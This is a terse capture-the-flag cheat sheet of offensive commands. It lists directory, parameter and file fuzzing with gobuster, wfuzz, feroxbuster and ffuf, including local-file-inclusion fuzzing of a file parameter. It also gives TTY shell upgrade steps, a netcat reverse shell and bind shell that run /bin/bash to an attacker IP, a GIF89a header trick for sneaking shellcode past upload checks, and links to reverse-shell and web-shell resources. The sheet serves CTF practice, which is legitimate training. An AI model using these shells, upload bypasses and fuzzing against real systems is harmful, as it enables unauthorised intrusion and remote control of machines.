CTF
General
ping
curl
nmap - init
nmap - full
hping3
enum4linux
create wordlist
curl http://11.22.33.44 | grep -oE '\w+' | sort -u -f > wordlist.lst
awk 'length($0) > 3 ' wordlist.lst > wordlist_gt3.lst
gobuster
gobuster dir --url <IP> -w /usr/share/wordlists/dirb/big.txt -b 404 -k -f -x php
gobuster dir --url <IP> --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url <IP>:7125 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -t 30 -k | tee gobuster_7125.raw.md
wfuzz
# === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL?user=FUZZ"
# === linux files
wfuzz -c -z file,'/usr/share/wordlists/payloadsAllTheThings/File Inclusion/Intruders/Linux-files.txt' --hw 0 "$(target)/console/file.php?file=FUZZ"
wfuzz -c -z file,'/usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt' --hw 0 "$(target)/console/file.php?file=FUZZ"
feroxbuster
feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf
ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2
autorecon
python local server
Other
spawning tty shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116
netcat nc shell
ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444
funny User-Agent
GIF89a; header
GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:
links
- https://gtfobins.github.io/
- https://lolbas-project.github.io/
- https://www.revshells.com/
- https://pentestmonkey.net
- https://pentestmonkey.net/tools/web-shells/php-reverse-shell
- https://gchq.github.io/CyberChef/
- https://www.guballa.de/vigenere-solver
- https://copy.sh/brainfuck/
- https://crackstation.net/
- https://hashes.com/en/decrypt/hash
- https://chmod-calculator.com/
- https://github.com/tomnomnom/assetfinder
- https://github.com/tomnomnom/httprobe
- https://github.com/tomnomnom/waybackurls